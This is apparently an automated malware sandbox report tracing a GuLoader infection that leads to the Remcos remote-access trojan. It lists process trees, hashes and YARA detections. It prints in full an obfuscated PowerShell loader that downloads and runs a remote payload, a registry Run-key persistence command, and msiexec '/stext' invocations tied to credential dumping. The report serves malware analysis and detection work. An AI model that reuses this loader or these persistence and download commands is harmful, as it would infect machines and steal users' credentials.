                                                                                                  Commandline:powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole. Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo rnmUncoeFllea w snnaal)tam. ';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit .mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1 .kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$ SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort- E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes 'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm= Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer ');kaldedes (Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r= Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;"
                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2257431898.00000244184D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:3
                                                                                                  Start time:03:40:01
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:03:40:12
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole. Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo rnmUncoeFllea w snnaal)tam. ';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit .mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1 .kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$ SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort- E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes 'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm= Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer ');kaldedes (Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r= Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;"
                                                                                                  Imagebase:0x50000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2419273887.0000000008590000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2419849580.0000000009833000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:03:40:12
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:03:40:27
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.2601743861.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.2602767372.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:10
                                                                                                  Start time:03:40:33
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
                                                                                                  Imagebase:0x1c0000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:11
                                                                                                  Start time:03:40:33
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:12
                                                                                                  Start time:03:40:33
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
                                                                                                  Imagebase:0xe90000
                                                                                                  File size:59'392 bytes
                                                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:15
                                                                                                  Start time:03:40:46
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:16
                                                                                                  Start time:03:40:46
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\spywiilbdcdmdbgkndbgftixng"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:17
                                                                                                  Start time:03:40:46
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:18
                                                                                                  Start time:03:40:46
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Executed Functions

                                                                                                    Function 00007FFD3476B0F6 Relevance: .5, Instructions: 474COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9a854cbb660fe731bb905ebd0adc8554eefdb56982ffb13a9695789e4a0fa039
                                                                                                    • Instruction ID: 754b0c22578f1912ed44956f72b8703a607d0f1266ffb1ee20240b87ff9af81d
                                                                                                    • Opcode Fuzzy Hash: 9a854cbb660fe731bb905ebd0adc8554eefdb56982ffb13a9695789e4a0fa039
                                                                                                    • Instruction Fuzzy Hash: 13F1B670A08A8D8FEBA8DF28C8557E937D2FF55310F04426EE84DC7295DB78A9458B81
                                                                                                    Function 00007FFD3476BEA2 Relevance: .5, Instructions: 460COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fd61b49a2e68144315f154eec4014aa4d501ce07cb9a8b061ea0dabb1e159a65
                                                                                                    • Instruction ID: f546fa9be0fb26919dfafbbc670de4b995bf6cbaa26a37d3ea8e7a5f919ed779
                                                                                                    • Opcode Fuzzy Hash: fd61b49a2e68144315f154eec4014aa4d501ce07cb9a8b061ea0dabb1e159a65
                                                                                                    • Instruction Fuzzy Hash: A1E1A470608A8E8FEBA8DF28C8657E977D1EF55310F14426EE84DC7291DE78A8458BC1
                                                                                                    Function 00007FFD3476D9F2 Relevance: .7, Instructions: 651COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7c48d855823181bbcf74811de135f819af75d6440f54cca6f099096318f26695
